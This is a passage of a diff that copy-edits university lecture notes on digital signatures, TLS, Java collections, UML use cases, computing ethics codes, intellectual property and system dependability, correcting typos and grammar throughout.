1. Compute $k_M=k_E^b\mod 67$
|
||||
@@ -128,7 +128,7 @@ Recall: $a^{p-1}\equiv 1\mod p$ for some $m$
|
||||
- Identical to DSA, ECDSA operates on an elliptic curve over $\mathbb{Z}_p$ with the signature calculated over a subgroup of prime order $\#q$
|
||||
- More efficient, does not require modulus of thousands of bits
|
||||
- Security level is based on generic attacks against EC
|
||||
- i.e $\sqrt{|\#q|}$
|
||||
- i.e. $\sqrt{|\#q|}$
|
||||
- Deterministic generation of $k$ is often used for safety (RFC 6979)
|
||||
- This is where the ephemeral key isn’t random, it’s based off the hash of the message
|
||||
- This is because reusing the ephemeral key is bad news
|
||||
|
||||
@@ -33,7 +33,7 @@ $$
|
||||
>
|
||||
> This requires using a private key
|
||||
|
||||
Symetric Signatures gives us:
|
||||
Symmetric signatures give us:
|
||||
|
||||
**Authenticity**: The sender is confirmed as authentic - only Alice or Bob could have generated the signature
|
||||
|
||||
@@ -41,7 +41,7 @@ Symetric Signatures gives us:
|
||||
|
||||
**Non-Repudiation**: We don’t have this - the symmetric key means that either Alice or Bob could have sent the message
|
||||
|
||||
### Pubic Key Signatures
|
||||
### Public Key Signatures
|
||||
|
||||
- By using asymmetric cryptography we have non-repudiation.
|
||||
|
||||
@@ -71,7 +71,7 @@ Verification: $s^e\mod n$
|
||||
##### Signature Forgeries
|
||||
|
||||
- A forgery is the ability to create a valid message / signature pair $(m,s)$ where $m$ hasn’t previously been signed by the legitimate signer
|
||||
- For example replay attack using a previous $(m,s)$ wouldn’t count as a forgery
|
||||
- For example, a replay attack using a previous $(m,s)$ wouldn’t count as a forgery
|
||||
- As we cannot control the message contents
|
||||
- Various severities of attack exist depending on the control over the message $m$
|
||||
|
||||
@@ -86,20 +86,20 @@ An attacker has access to Alice’s public key $(n,e)$
|
||||
- They can calculate
|
||||
- $s=\textrm{random}$
|
||||
- $m' =s^e\mod n$
|
||||
- It is trival to generate message and signature pairs based on an RSA public key
|
||||
- It is trivial to generate message and signature pairs based on an RSA public key
|
||||
- Not very useful
|
||||
|
||||
###### Selective Forgeries
|
||||
|
||||
- The attacker is able to create a valid message / signature pair $(m,s)$ where they have selected $m$ in advanced
|
||||
- $m$ may have some mathematical proprieties, or be all zeros etc
|
||||
- The attacker is able to create a valid message / signature pair $(m,s)$ where they have selected $m$ in advance
|
||||
- $m$ may have some mathematical properties, or be all zeros etc.
|
||||
- It is a requirement that $m$ be fixed prior to the attack
|
||||
|
||||
###### Universal Forgeries
|
||||
|
||||
- The attacker can create a valid signature from any message $m$
|
||||
- This is the strongest attack, and implies the previous attacks too
|
||||
- In RSA, this would imply the attack has access to the private key
|
||||
- In RSA, this would imply the attacker has access to the private key
|
||||
|
||||
### Malleability
|
||||
|
||||
@@ -112,11 +112,13 @@ An attacker has access to Alice’s public key $(n,e)$
|
||||
### Padding
|
||||
|
||||
- If we enforce rules about valid formatting on $m$, random messages produced by attackers are unlikely to pass
|
||||
|
||||
- 
|
||||
|
||||
- Likelihood of a successful forgery is $2^{-y}$
|
||||
- Probability of last bit $2^{-1}$
|
||||
- Probability of last 2 bits $2^{-2}$
|
||||
- etc up to $y$
|
||||
- etc. up to $y$
|
||||
|
||||
#### Hash-then-sign
|
||||
|
||||
@@ -145,8 +147,8 @@ An attacker has access to Alice’s public key $(n,e)$
|
||||
|
||||
- “with appendix” refers to any scheme that sends $(m,s)$ separately
|
||||
- PKCS and similar schemes are deterministic
|
||||
- The probabilistic signature scheme adds a random salt to the process, meaning repeated singatures on the same document produce different results
|
||||
- Doesn’t effect security that much, some standards have gone back to a probabilistic approach
|
||||
- The probabilistic signature scheme adds a random salt to the process, meaning repeated signatures on the same document produce different results
|
||||
- Doesn’t affect security that much; some standards have gone back to a probabilistic approach
|
||||
|
||||
###### PSS Encoding
|
||||
|
||||
@@ -180,4 +182,4 @@ An attacker has access to Alice’s public key $(n,e)$
|
||||
|
||||
Nothing is faster than RSA verification, signing is slower
|
||||
|
||||
Its quick because of how 65537 is structured
|
||||
It's quick because of how 65537 is structured
|
||||
@@ -4,7 +4,7 @@
|
||||
|
||||
- Could we simply split up a message and sign parts?
|
||||
|
||||
\
|
||||

|
||||
|
||||
A lot of faff for signing large files
|
||||
|
||||
@@ -37,7 +37,7 @@ A lot of faff for signing large files
|
||||
|
||||

|
||||
|
||||
Oscar finds a weak message (one of the messages is known ahead of time), he replaces the message $x_1$ with $x_2$. Now Oscar can send a signed message to Alice
|
||||
Oscar finds a weak message (one of the messages is known ahead of time); he replaces the message $x_1$ with $x_2$. Now Oscar can send a signed message to Alice
|
||||
|
||||
#### Collision Resistance
|
||||
|
||||
|
||||
@@ -18,7 +18,7 @@
|
||||
|
||||
#### Authenticated Encryption (AEAD)
|
||||
|
||||
- It’s common to attach MACs to the end of ciphertext, that this is now usually built into ciphers as part of AEAD mode
|
||||
- It’s common to attach MACs to the end of ciphertext; this is now usually built into ciphers as part of AEAD mode
|
||||
- You’re often able to authenticate non-encrypted “associated” data too
|
||||
|
||||

|
||||
@@ -71,6 +71,7 @@ Random Number: 16cf43a...
|
||||
Suite: TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
|
||||
[Session ID]
|
||||
```
|
||||
|
||||
Random nonce used to stop replay attacks
|
||||
|
||||
**Certificate**
|
||||
@@ -97,7 +98,7 @@ Digital Signature calculated over the DH parameters
|
||||
|
||||
**[Certificate Request]**
|
||||
|
||||
Optional request for a certificate and singature from the client - only used in mutual TLS
|
||||
Optional request for a certificate and signature from the client - only used in mutual TLS
|
||||
|
||||
Imagine two banks communicating where both parties need to prove their identity.
|
||||
|
||||
@@ -117,7 +118,7 @@ Optional client certificate, verified by the server using PKI
|
||||
|
||||
**[Certificate Verify]**
|
||||
|
||||
Digital signature computed over the bytes send in the handshake so far
|
||||
Digital signature computed over the bytes sent in the handshake so far
|
||||
|
||||
**Change Cipher Spec**
|
||||
|
||||
@@ -186,5 +187,5 @@ Mitigates man-in-the-middle attacks
|
||||
- Major OS vendors operate *root certificate programs*
|
||||
- Apple for iOS and OS X
|
||||
- Microsoft for Windows
|
||||
- Mozilla maintains root certificate store
|
||||
- Used in linux & firefox
|
||||
- Mozilla maintains a root certificate store
|
||||
- Used in Linux & Firefox
|
||||
@@ -4,24 +4,28 @@ Week 3 (Oct 5th)
|
||||
|
||||
**Part 1**
|
||||
|
||||
In java a *collection* is an object that represents a group of objects.
|
||||
In Java, a *collection* is an object that represents a group of objects.
|
||||
The collections API is a unified framework for representing and manipulating collections independently of their implementation.
|
||||
|
||||
An *API* (application programming interface) is an interface protocol between a client and a server, intended to simplify the client side software.
|
||||
An *API* (application programming interface) is an interface protocol between a client and a server, intended to simplify the client-side software.
|
||||
|
||||
A *library* contains re-usable chunks of code.
|
||||
A *library* contains reusable chunks of code.
|
||||
|
||||
**Java Collections framework**
|
||||
|
||||
- We have container objects that contain objects
|
||||
- All containers are either "collections" or "maps"
|
||||
- All containers provide a common set of method signatures, in addition of their unique set of method signatures
|
||||
- All containers provide a common set of method signatures, in addition to their unique set of method signatures
|
||||
|
||||
*Collection* - Something that holds a dynamic collection of objects
|
||||
*Map* - Defines mapping between keys and objects (two collections)
|
||||
*Iterable* - Collections are able to return an iterator objects that can scan over the contents of a collection one object at a time
|
||||
|
||||
NOTE: Vector is a legacy structure in Java replaced with *ArrayList*
|
||||
Stack is now *ArrayDeque*
|
||||
*Map* - Defines mapping between keys and objects (two collections)
|
||||
|
||||
*Iterable* - Collections are able to return an iterator object that can scan over the contents of a collection one object at a time
|
||||
|
||||
NOTE: Vector is a legacy structure in Java replaced with *ArrayList*.
|
||||
|
||||
Stack is now *ArrayDeque*.
|
||||
|
||||
`LinkedList(Collection<? extends E> c)` - means some type that either is E or a subtype of E. The `?` is a wildcard.
|
||||
|
||||
@@ -34,7 +38,7 @@ public static void main(String[] args) {
|
||||
}
|
||||
```
|
||||
|
||||
This is bad coding practice, the collection constructor are not able to specify the type of objects the collection is intended to contain. A `ClassCastException` will be thrown if we attempt to cast the wrong type.
|
||||
This is bad coding practice: the collection constructor does not specify the type of objects the collection is intended to contain. A `ClassCastException` will be thrown if we attempt to cast to the wrong type.
|
||||
|
||||
```java
|
||||
public static void main(String[] args) {
|
||||
@@ -45,13 +49,15 @@ public static void main(String[] args) {
|
||||
}
|
||||
```
|
||||
|
||||
This is a type safe collection using generics.
|
||||
This is a type-safe collection using generics.
|
||||
|
||||
- Classes support generics by allowing a type variable to be included in their declaration.
|
||||
- The `<>` show the same type as stated (in this case string)
|
||||
- You cannot type a collection with a primitive data type eg int
|
||||
- The `<>` indicate the same type as stated (in this case `String`)
|
||||
- You cannot type a collection with a primitive data type, e.g. `int`
|
||||
|
||||
**HashMap Class**
|
||||
- A HashMap is a hash table based implementation of the map interface. This implementation provides all if the optional map operations, and permits null values and the null key.
|
||||
|
||||
- A HashMap is a hash-table-based implementation of the map interface. This implementation provides all of the optional map operations and permits null values and the null key.
|
||||
|
||||
```java
|
||||
public static void main(String[] args) {
|
||||
@@ -79,7 +85,7 @@ Millie = 17
|
||||
__Relationships between objects__
|
||||
|
||||
*Aggregation* - The object exists outside the other. It is created outside so it is passed as an argument.
|
||||
An animal object *is part of* a compound object (semantically) but the animal object can be shared and if the compound object is deleted, the animal object isn't deleted.
|
||||
An animal object *is part of* a compound object (semantically), but the animal object can be shared. If the compound object is deleted, the animal object isn't deleted.
|
||||
|
||||
```java
|
||||
public class Compound {
|
||||
@@ -93,7 +99,7 @@ public class Compound {
|
||||
|
||||

|
||||
|
||||
*Composition* - The object only exists if the parent object exists, if the parent object is deleted then so is the child object.
|
||||
*Composition* - The object only exists if the parent object exists. If the parent object is deleted, then so is the child object.
|
||||
The zoo object owns the compound object. If the zoo object is deleted then the compound object is also deleted.
|
||||
|
||||
```java
|
||||
@@ -105,11 +111,13 @@ public class Zoo {
|
||||

|
||||
|
||||
**Inheritance**
|
||||
A way of forming new classes based on existing classes. Has a "is-a" relationship.
|
||||
|
||||
*Polymorphism* - A concept in object oriented programming. Method overloading and method overriding are two types of polymorphism.
|
||||
A way of forming new classes based on existing classes. Has an "is-a" relationship.
|
||||
|
||||
*Polymorphism* - A concept in object-oriented programming. Method overloading and method overriding are two types of polymorphism.
|
||||
|
||||
- *Method Overloading* - Methods with the same name co-exist in the same class but they must have different method signatures. Resolved during compile time (static binding).
|
||||
- *Method Overriding* - Methods with the same name is declared in parent and child class. Resolved during runtime (dynamic binding).
|
||||
- *Method Overriding* - Methods with the same name are declared in parent and child classes. Resolved at run time (dynamic binding).
|
||||
|
||||
```java
|
||||
public class Child extends Parent {
|
||||
@@ -124,12 +132,13 @@ public class Child extends Parent {
|
||||
}
|
||||
```
|
||||
|
||||
The super keyword called the parent class' constructor.
|
||||
The `super` keyword calls the parent class's constructor.
|
||||
|
||||

|
||||
|
||||
**What is the difference between an abstract class and an interface**
|
||||
- Java abstract class can have instance methods that implement a default behaviour. May contain non-final variables.
|
||||
**What is the difference between an abstract class and an interface?**
|
||||
|
||||
- A Java abstract class can have instance methods that implement a default behaviour. It may contain non-final variables.
|
||||
- Java interfaces have methods that are implicitly abstract and cannot have implementations. Variables are declared final by default.
|
||||
|
||||
Interfaces are less restrictive when it comes to inheritance, interfaces can have many levels of inheritance where as a class can only have one level.
|
||||
Interfaces are less restrictive when it comes to inheritance: interfaces can have many levels of inheritance, whereas a class can only have one level.
|
||||
@@ -15,7 +15,6 @@ Latest version: **2.6**
|
||||
|
||||
<img src="assets/4.png" alt="img" style="zoom:80%;" />
|
||||
|
||||
|
||||
## Object Orientated Analysis
|
||||
|
||||
**Use case diagrams**
|
||||
@@ -27,9 +26,9 @@ Latest version: **2.6**
|
||||
|
||||
`Actors` - Entities that interface with the system. Can be people or other systems.
|
||||
|
||||
`Use case` - Based on user stories and represent what the actor wants your system to do for them. In the use case diagram only the use case name is represented.
|
||||
`Use case` - Based on user stories and represents what the actor wants your system to do for them. In the use case diagram, only the use case name is represented.
|
||||
|
||||
`Subject` - Classifier representing a business, software system, physical system or device under analysis design, or consideration.
|
||||
`Subject` - Classifier representing a business, software system, physical system or device under analysis, design or consideration.
|
||||
|
||||
`Relationships`
|
||||
|
||||
@@ -42,21 +41,18 @@ Latest version: **2.6**
|
||||
> 1. Specifying common functionality and simplifying use case flows
|
||||
> 2. Using <<include>> or <<extend>>
|
||||
|
||||
**`<<include>>`**- multiple use cases share a piece of same functionality which is placed in a separate use case.
|
||||
**`<<include>>`** - Multiple use cases share a piece of the same functionality, which is placed in a separate use case.
|
||||
|
||||
**`<<extend>>`** - Used when activities might be performed as part of another activity but are not mandatory for a use case to run successfully.
|
||||
|
||||
|
||||
**Use case diagram of a fleet logistics management company**
|
||||
|
||||

|
||||
|
||||
|
||||
**Base Path** - The optimistic path (best case scenario)
|
||||
|
||||
**Alternative Path** - Every other possible way the system can be used/abused. Includes perfectly normal alternate use, but also errors and failures.
|
||||
|
||||
|
||||
Use Case: `Borrow copy of book`
|
||||
|
||||
> **Purpose**: The book borrower (BB) borrows a book from the library using the Library Booking System (LBS)
|
||||
@@ -72,7 +68,7 @@ Use Case: `Borrow copy of book`
|
||||
> 2. BB provides membership card
|
||||
> 3. BB is logged in by LBS
|
||||
> 4. LBS checks permissions / debts
|
||||
> 5. LBS asks for presenting a book
|
||||
> 5. LBS asks the borrower to present a book
|
||||
> 6. BB presents a book
|
||||
> 7. LBS scans RFID tag inside book
|
||||
> 8. LBS updates records accordingly
|
||||
@@ -84,9 +80,8 @@ Use Case: `Borrow copy of book`
|
||||
>
|
||||
> 1. BB's card has expired: Step 3a: LBS must provide a message that card has expired; LBS must exit the use case
|
||||
>
|
||||
> **Post conditions for base path**
|
||||
> **Postconditions for base path**
|
||||
>
|
||||
> **Base path** - BB has successfully borrowed the book & system is up to date.
|
||||
> **Base path** - BB has successfully borrowed the book and the system is up to date.
|
||||
>
|
||||
> **Alternate Path 1** - BB was NOT able to borrow the book & system is up to date.
|
||||
|
||||
> **Alternative Path 1** - BB was NOT able to borrow the book and the system is up to date.
|
||||
@@ -1,8 +1,9 @@
|
||||
# Why do we need Professional Ethics
|
||||
|
||||
Computers enable social harm:
|
||||
|
||||
|
||||
## Illegal content and activity
|
||||
|
||||
- Terrorism
|
||||
- Crypto-currencies can finance this
|
||||
- Organised crime
|
||||
@@ -20,33 +21,36 @@ Computers enable social harm:
|
||||
- Solicitation, Grooming, Distribution of images & videos
|
||||
- Trafficking
|
||||
|
||||
## Impact on health and well being
|
||||
## Impact on health and well-being
|
||||
|
||||
- Computers can affect physical, social and mental health
|
||||
- Lower physical activity
|
||||
- Increases loneliness
|
||||
- Designed for addiction
|
||||
- Click bait
|
||||
- Clickbait
|
||||
- Infinite scroll
|
||||
- Short term dopamine-driven feedback loops - Chamath Palihapitya (ex Facebook VP)
|
||||
- Short-term dopamine-driven feedback loops - Chamath Palihapitya (ex Facebook VP)
|
||||
- Self-harm
|
||||
- Enables people to research self harm methods
|
||||
- Enables people to research self-harm methods
|
||||
- Validates negative feelings
|
||||
- Legitimise suicide as an acceptable course of action
|
||||
- Legitimises suicide as an acceptable course of action
|
||||
|
||||
## Threats to our way of life
|
||||
|
||||
- Manipulating public opinion
|
||||
- Can be state sanctioned
|
||||
- Can be state-sanctioned
|
||||
- Distribution of inaccurate information, disinformation and fake news
|
||||
- The Oxford internet institute found 26 countries including China, Turkey and Russia were using computational propaganda to suppress human rights and discredit political opposition
|
||||
|
||||
### Risk to critical national infrastructure
|
||||
|
||||
- Cyber attacks on nuclear power stations, electricity grids, banking communications
|
||||
- WannaCry targeting the NHS
|
||||
|
||||
## Environmental Impact
|
||||
|
||||
- Data centres consume huge amounts of energy
|
||||
- Consumed 416.2 TWH of electricity - more than the total UK’s power consumption
|
||||
- Consumed 416.2 TWH of electricity - more than the UK’s total power consumption
|
||||
- 3% of global electricity supply
|
||||
- 2% of greenhouse gas emissions
|
||||
|
||||
@@ -61,4 +65,5 @@ Computers enable social harm:
|
||||
- £20,000,000 or 4% of total annual turnover - whichever is greater.
|
||||
|
||||
# A world under attack
|
||||
|
||||
It’s not computer scientists who do harm, but the way the technology is designed, who designed it and the outcomes it is trying to achieve influence how it impacts its users and wider society.
|
||||
@@ -5,23 +5,27 @@
|
||||
## Morally permissible
|
||||
|
||||
- Morality is ubiquitous, as moral standards apply to everyone
|
||||
- Professional ethics only apply to the members of particular groups (such as lawyers, doctors etc)
|
||||
- Professional ethics only apply to the members of particular groups (such as lawyers, doctors, etc.)
|
||||
|
||||
**Ethical does not equal moral**
|
||||
|
||||
>For example it is against ethical standards in the USA for doctors to advertise prices for their services, but there is nothing inherently immoral about advertising prices for services.
|
||||
|
||||
- An action may be morally permissible but unethical
|
||||
- It is also possible to behave ethically but apparently immorally
|
||||
- Professional ethics requires that one behaves consistently with the standards of the group.
|
||||
|
||||
**Professional ethics is a subset of moral concerns**
|
||||
|
||||
- Morality encompasses societal reasoning and norms of conduct as to what constitutes right and wrong
|
||||
- Professional ethics govern professional practice with respect to particular moral issues or challenges like *algorithmic decisions*
|
||||
- As the broader social-moral order evolves so do professional ethics, like ACM Code of Ethics
|
||||
- As the broader social-moral order evolves, so do professional ethics, like the ACM Code of Ethics
|
||||
|
||||
## Standards
|
||||
|
||||
Govern professional practice
|
||||
Standards consist of:
|
||||
|
||||
- Principles
|
||||
- Rules of Conduct
|
||||
- Embedded in code of conduct or code of ethics
|
||||
@@ -29,11 +33,12 @@ Standards consist of:
|
||||
>A professional puts profession first. When a conflict arises between the professional's code and the policy of an employer or the law, the professional's code must take precedence - Brinkman & Sanders, *Ethics in Computing Culture.* Boston: Cengage Learning, 2013.
|
||||
|
||||
### Shared by a Group
|
||||
|
||||
Standards are shared by a cohort of people engaged in professional activity
|
||||
|
||||
**What constitutes professional activity?**
|
||||
|
||||
- Provides an important service to soceity
|
||||
- Provides an important service to society
|
||||
- Requires extensive training
|
||||
- Involves significant intellectual effort
|
||||
- Organisation of members
|
||||
@@ -41,15 +46,19 @@ Standards are shared by a cohort of people engaged in professional activity
|
||||
- Certification or Licensing
|
||||
|
||||
#### Is computing a profession?
|
||||
|
||||
The problematic static of computing
|
||||
|
||||
- Lack of accreditation, certification or licensing
|
||||
+ No single organisation of members for the computing profession
|
||||
- No single organisation of members for the computing profession
|
||||
|
||||
Question is immaterial:
|
||||
The harms enabled by computing mean that computing professionals still have important ethical obligations
|
||||
|
||||
>Programmers need ethics when designing the technologies that influence people's lives - President of the ACM
|
||||
|
||||
We still need professional ethics in computing even if computings professional status is dubitable.
|
||||
We still need professional ethics in computing even if computing’s professional status is dubitable.
|
||||
|
||||
- We need ethics if we are to be considered professionals
|
||||
|
||||
> It is impossible to satisfy the definition of profession without a code of ethics, impossible to teach 'professionalism' without teaching the code, and indeed impossible to understand professions without understanding them as bound by such a code. Without a code of ethics, there are only honest occupations, trade associations, and the like - Micheal Davis
|
||||
@@ -72,18 +81,18 @@ These standards require:
|
||||
- Only undertake to do work or provide a service that is within your professional competence
|
||||
- Do not claim a level of competence that you do not possess
|
||||
- Continue to develop professional knowledge relevant to your field
|
||||
- Ensure that you have the knowledge and understanding of relevent legislation
|
||||
- Ensure that you have the knowledge and understanding of relevant legislation
|
||||
- Respect and value alternate viewpoints
|
||||
- Avoid injuring others
|
||||
- Reject and will not make any offer of bribery or unethical inducement
|
||||
- Reject and do not make any offer of bribery or unethical inducement
|
||||
|
||||
##### Duty to relevant authority
|
||||
|
||||
- Carry out your professional responsiblities with due care and diligence
|
||||
- Carry out your professional responsibilities with due care and diligence
|
||||
- Avoid situations that conflict with the interests of relevant authorities
|
||||
- Accept professioal responsibilities for your work
|
||||
- Accept professional responsibilities for your work
|
||||
- Do not disclose confidential information
|
||||
- Do not misrepresent or withhold information on the performance of products, system or services
|
||||
- Do not misrepresent or withhold information on the performance of products, systems or services
|
||||
|
||||
##### Duty to Profession
|
||||
|
||||
@@ -105,7 +114,7 @@ Covers about half of what the BCS covers, little attention to duty to relevant a
|
||||
25 principles governing professional conduct
|
||||
|
||||
- 7 general ethical principles
|
||||
- 9 principles governing professional responsiblities
|
||||
- 9 principles governing professional responsibilities
|
||||
- 7 principles of professional leadership
|
||||
- 2 principles of compliance
|
||||
|
||||
@@ -117,15 +126,15 @@ Covers about half of what the BCS covers, little attention to duty to relevant a
|
||||
- Be fair and take action not to discriminate
|
||||
- Respect the work of others
|
||||
- Respect privacy
|
||||
- Honor confidentiality
|
||||
- Honour confidentiality
|
||||
- Unless in cases in which it is evidence of the violation of law or the code itself
|
||||
|
||||
This links to the BCS public interest requirement
|
||||
|
||||
##### Professional responsibilities
|
||||
|
||||
- Strive to achieve high quality work
|
||||
- Maintain high standards to professional competence
|
||||
- Strive to achieve high-quality work
|
||||
- Maintain high standards of professional competence
|
||||
- Know and respect rules pertaining to professional work
|
||||
- Accept and provide appropriate professional review
|
||||
- Evaluate computer systems and possible risks
|
||||
@@ -143,8 +152,8 @@ This links to the BCS public interest requirement
|
||||
- Promote social responsibility
|
||||
- Enhance quality of working life
|
||||
- Support the principles of the code
|
||||
- Create oppotunities for professional development
|
||||
- User care when modifying or retiring systems
|
||||
- Create opportunities for professional development
|
||||
- Use care when modifying or retiring systems
|
||||
- Take special care of systems integrated in societal infrastructure
|
||||
|
||||
##### Compliance with the Code
|
||||
@@ -158,8 +167,3 @@ This links to the BCS public interest requirement
|
||||
|
||||
- More to the ACM code
|
||||
- But a strong relationship between the two exists, although it is not always direct
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -2,7 +2,7 @@
|
||||
|
||||
The coursework issue is about a class action lawsuit against Ring.
|
||||
|
||||
file: <studentID>_Surname
|
||||
file: `<studentID>_Surname`
|
||||
|
||||
## Example of applying Codes
|
||||
|
||||
@@ -29,19 +29,19 @@ The example is taken from the ACM code of ethics - case study 5
|
||||
- `2.3` Know and respect rules pertaining to professional work
|
||||
- This is broken as a federal law is being broken
|
||||
- `2.5` Evaluate computer systems and their impacts, including risks
|
||||
- Extraordinary care be taken to identify and mitigate potential risks. Blocker Plus violates this principle by allowing its feedback algorithm to be manipulated by activists to corrupt the classification model.
|
||||
- Extraordinary care should be taken to identify and mitigate potential risks. Blocker Plus violates this principle by allowing its feedback algorithm to be manipulated by activists to corrupt the classification model.
|
||||
- `2.9` Design and implement robustly and usably secure systems
|
||||
- 2.9 requires that computing professionals should perform due diligence to ensure systems function as intended, and take appropriate action to secure resources against accidental and intentional misuse, modification or denial of service. That the activists were able to intentionally misuse Blocker Plus means that the system violates this principle
|
||||
- `1.2` Avoid harm
|
||||
- Avoid harm applies as the corruption of the machine learning model means that information of legitimate public interest (gay & lesbian marriage) and safety (vaccinations and climate change) is suppressed by the activists' intentional misuse of the system
|
||||
- `1.4` Be fair and do not discriminate
|
||||
- This applies in the respect of suppression of information of legitimate public interest enables discrimination of the basis of sex and sexual orientation
|
||||
- This applies in the respect that suppression of information of legitimate public interest enables discrimination on the basis of sex and sexual orientation
|
||||
- `3.7` Take special care of systems integrated into societal infrastructure
|
||||
- Applies as Blocker Plus is designed for educational purposes. In failing to prevent intentional misuse of the system, the leadership of Blocker Plus have failed in their responsibility to be good stewards of the system and enabling fair access.
|
||||
- Applies as Blocker Plus is designed for educational purposes. In failing to prevent intentional misuse of the system, the leadership of Blocker Plus have failed in their responsibility to be good stewards of the system and enable fair access.
|
||||
|
||||
Codes for the coursework only apply in negative reasons, e.g. 1.1 may apply as amazon wished to contribute to society and human well being. However this will not be marked.
|
||||
Codes for the coursework only apply for negative reasons, e.g. 1.1 may apply as Amazon wished to contribute to society and human well-being. However, this will not be marked.
|
||||
|
||||
There is one code in the amazon ring that there is no evidence of, however it is inferred by a *lack* of action.
|
||||
There is one code in the Amazon Ring case that there is no evidence of; however, it is inferred by a *lack* of action.
|
||||
|
||||
## The ACM CARE Framework
|
||||
|
||||
@@ -55,19 +55,18 @@ What were the observable effects of Amazon's actions or decisions for Ring users
|
||||
|
||||
##### Analyse
|
||||
|
||||
What stakeholder rights (legal, natural or social) were impacted and to what extent, and ask what principles of the code are relevent here.
|
||||
What stakeholder rights (legal, natural or social) were impacted and to what extent, and ask what principles of the code are relevant here.
|
||||
|
||||
> What stakeholder rights (legal, natural, or social) were impacted and to what extent? What technical facts are most relevant to the actors’ decision? What principles of the Code were most relevant? What personal, institutional, or legal values should be considered?
|
||||
|
||||
##### Review
|
||||
|
||||
What potential actions could changed the outcomes
|
||||
What potential actions could have changed the outcomes
|
||||
|
||||
> What responsibilities, authority, practices, or policies shaped the actors’ choices? What potential actions could have changed the outcomes?
|
||||
|
||||
##### Evaluate
|
||||
|
||||
What actions (or lack of actions) supported or violated the Code. Are the actions taken in this case justified, particularly when considering the rights of and impact on all stakeholders.
|
||||
What actions (or lack of actions) supported or violated the Code? Are the actions taken in this case justified, particularly when considering the rights of and impact on all stakeholders?
|
||||
|
||||
> How might the decision in this case be used as a foundation for similar future cases? What actions (or lack of action) supported or violated the Code? Are the actions taken in this case justified, particularly when considering the rights of and impact on all stakeholders?
|
||||
|
||||
@@ -20,7 +20,7 @@ This means:
|
||||
- Appropriate steps are taken to avoid harm
|
||||
- Systems are robust, secure and respect privacy
|
||||
- Rules are followed
|
||||
- Special care is taken when modifying or retiring systems or systems are integrated in societal infrastructure
|
||||
- Special care is taken when modifying or retiring systems or when systems are integrated into societal infrastructure
|
||||
|
||||
### Public Good
|
||||
|
||||
@@ -32,8 +32,8 @@ This means:
|
||||
- Entirely natural
|
||||
- Can be mitigated
|
||||
- Draws our attention to micro-issues
|
||||
- for example discriminate against people of tattoos, or people with piercings
|
||||
- Can have an squally detrimental effect as the big issues
|
||||
- For example, discriminating against people with tattoos or people with piercings
|
||||
- Can have an equally detrimental effect as the big issues
|
||||
- Design to minimise unconscious bias
|
||||
|
||||
### Respect the Work of Others
|
||||
@@ -70,7 +70,7 @@ Used where products have a short design life e.g. fashion
|
||||
|
||||
- An exclusive right granted to protect an invention
|
||||
- Prevents others from making, using, offering for sale, selling or importing invention without owner's permission
|
||||
- Lasts for **20** years from date of filed
|
||||
- Lasts for **20** years from the filing date
|
||||
- Costs between $3,000 and \$6,000
|
||||
- Can't patent a computer program only a "computer-implemented invention"
|
||||
|
||||
@@ -94,9 +94,9 @@ Used where products have a short design life e.g. fashion
|
||||
- Author's or creator's right to protection over uses of their work
|
||||
- Ideas cannot be copyrighted, only the concrete implementation of the idea
|
||||
- Obtained automatically
|
||||
- Includes economic rights (renumeration for use by others)]
|
||||
- Includes economic rights (remuneration for use by others)
|
||||
- Fair use allowed
|
||||
- Covers life-time of owners plus **50-70** years
|
||||
- Covers lifetime of owners plus **50-70** years
|
||||
|
||||
###### Databases
|
||||
|
||||
@@ -109,7 +109,7 @@ Used where products have a short design life e.g. fashion
|
||||
|
||||
###### Domain Names
|
||||
|
||||
- Registered by ICANN registars
|
||||
- Registered by ICANN registrars
|
||||
- Not protected by copyright
|
||||
- May be protected by a registered trade mark
|
||||
- Last up to **10** years, renewed indefinitely
|
||||
@@ -118,11 +118,11 @@ Used where products have a short design life e.g. fashion
|
||||
|
||||
Don't go too far in protecting your own works
|
||||
|
||||
###### Sony Rookit
|
||||
###### Sony Rootkit
|
||||
|
||||
They produced CDs that when entered into a computer downloaded a rootkit which gained administrator control on the victims computer.
|
||||
They produced CDs that, when inserted into a computer, downloaded a rootkit which gained administrator control on the victim’s computer.
|
||||
|
||||
Rookit modified the victims OS, limiting the users ability to use the CD.
|
||||
The rootkit modified the victim’s OS, limiting the user’s ability to use the CD.
|
||||
|
||||
**Profoundly unethical and illegal**
|
||||
|
||||
|
||||
@@ -2,7 +2,7 @@
|
||||
|
||||
### What is a dependable System
|
||||
|
||||
Another way of putting it is that computing systems, especially systems built into societal infrastructure, and which are otherwise safety-critical as London ambulance system was, are **dependable**.
|
||||
Another way of putting it is that computing systems, especially systems built into societal infrastructure, and which are otherwise safety-critical as the London ambulance system was, are **dependable**.
|
||||
|
||||
**Dependability** is defined by Brian Randell as the **trustworthiness** of a computer system such that reliance can justifiably be placed on the service it delivers. Dependability thus includes such properties as:
|
||||
|
||||
@@ -15,11 +15,11 @@ Another way of putting it is that computing systems, especially systems built in
|
||||
|
||||
And provides a convenient means of subsuming these various concerns within a single conceptual framework.
|
||||
|
||||
**Reliability** means that a system provides continuity of correct service during its useful lifetime, from commisioning, through operation, to decomissioning.
|
||||
**Reliability** means that a system provides continuity of correct service during its useful lifetime, from commissioning, through operation, to decommissioning.
|
||||
|
||||
**Safety** means that a system is engineered to avoid catastrophic consequences for user and the environment and that the life-critical system behaves as needed, even if components fail.
|
||||
**Safety** means that a system is engineered to avoid catastrophic consequences for users and the environment and that the life-critical system behaves as needed, even if components fail.
|
||||
|
||||
**Integrity** means that a system’s source code or state cannot be altered improperly, i.e., it is secure, or its data be corrupted.
|
||||
**Integrity** means that a system’s source code or state cannot be altered improperly, i.e., it is secure, or its data cannot be corrupted.
|
||||
|
||||
**Maintainability** means that a system is engineered to permit adaptive maintenance, ease of modification and repair of defects.
|
||||
|
||||
@@ -27,27 +27,27 @@ And provides a convenient means of subsuming these various concerns within a sin
|
||||
|
||||
##### Uber’s self-driving car accident
|
||||
|
||||
- Back up drivber charged with negligent homicide
|
||||
- However the National Transport Safety Board finds ubers system to be at fault
|
||||
- Backup driver charged with negligent homicide
|
||||
- However, the National Transport Safety Board finds Uber’s system to be at fault
|
||||
- While Uber’s radar and Lidar detected Elaine 6 seconds before the impact, their system did not have the capacity to **classify** the object as a pedestrian unless they were near a crosswalk
|
||||
- It classified Elaine as a vehicle, bicycle and an unknown object
|
||||
- It assumed Elaine would be travelling in the same direction as the car and therefore did not slow down
|
||||
